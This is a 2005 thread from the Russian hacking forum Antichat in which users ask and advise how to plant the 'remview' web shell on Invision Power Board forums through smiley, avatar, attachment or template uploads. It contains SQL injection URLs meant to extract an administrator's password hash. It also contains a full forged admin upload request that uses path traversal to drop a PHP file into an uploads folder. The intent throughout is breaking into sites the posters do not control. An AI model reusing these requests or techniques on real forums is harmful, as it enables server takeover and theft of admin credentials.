Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Вопрос про заливку шелла в Invision Power Board (https://forum.antichat.xyz/showthread.php?t=5205)

DiNo 15.02.2005 16:53
Вопрос про заливку шелла в Invision Power Board
 
как залить remview в Invision Power Board? Я прочитал статью как можно через смайлики но нифига не понял. Что можно сделать? Как можно по другому получить доступ?

DiNo 16.02.2005 01:11
Ну объясните кто нибудь.

link 16.02.2005 01:54
ДА блин проверки нет, кидаеш туды файл вместо смайла и все.

(-=util=-) 16.02.2005 04:42
А где можно феньку со смайлами найти? Чегото я немогу обнаружить.... :\

И вот я пытал ipb 1.3 final но чтото бесполезно =\

http://[target]/forum/index.php?act=Search&nav=lv&CODE=show&searchid=[my_id]&search_in=topics&result_type=topics&hl=&st=20SELE CT password FROM ibf_members WHERE name='mega_admin'/*

и вот ещё

http://[target]/index.php?showforum=1&prune_day=100&sort_by=Z-A&sort_key=SELECT password FROM ibf_members WHERE name='maga_admin'

вот ёлки палки ничего неполучилось... =\
Пытался залить shell в аватары but can't :(

DiNo 16.02.2005 11:56
Не качается через смайлы я уже пробовал. Папка походу на запись закрыта.

Black_Death 16.02.2005 12:25
Мля ну другую папку найди...например с аватарами! Про это же несколько статей есть на античате!!!

KEZ 16.02.2005 14:50
Хехехе вы вместо [my_id] и других подставьте значения конкретные )))
Эта SQL injection работает только в 2.x
Шелл залить либо через присоединенный файл, либо через смайлы либо через
темплейты

(-=util=-) 16.02.2005 16:07
нет ну значения то конкретные на форуме были)))
Вот как с смайлами что то непонятно
Смайлы и аватары wget'ом тоже?

DiNo 16.02.2005 19:26
Вот подделанный запрос из статьи
Код:
POST http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7 HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Referer: http://someSiteForum/admin.php?adsess=7456d367b18da87d161f59424a4e96f7&act=op&code=emo
Accept-Language: ru
Content-Type: multipart/form-data; boundary=---------------------------7d43942c405bc
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Length: 677
Pragma: no-cache
Cookie: member_id=1; pass_hash=cf20fc37b4g0be45c1336f29d444e798;

-----------------------------7d43942c405bc
Content-Disposition: form-data; name="adsess"

7456d367b18da87d161f59424a4e96f7
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="code"

emo_upload
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="act"

op
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000000
-----------------------------7d43942c405bc
Content-Disposition: form-data; name="FILE_UPLOAD"; filename="../../uploads/myFile.php"
Content-Type: application/octet-stream

<% echo("Hello from injected PHP script") %>
-----------------------------7d43942c405bc--
Где на моем компе должен лежать remview?
../../uploads/myFile.php
Я прочитал статью но нихрена не получается.

KEZ 16.02.2005 20:02
Неее, лутше просто залить через смайлы - если папка закрыта то неполучится...
Но тольок при чем тут wget?


Время: 13:12
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице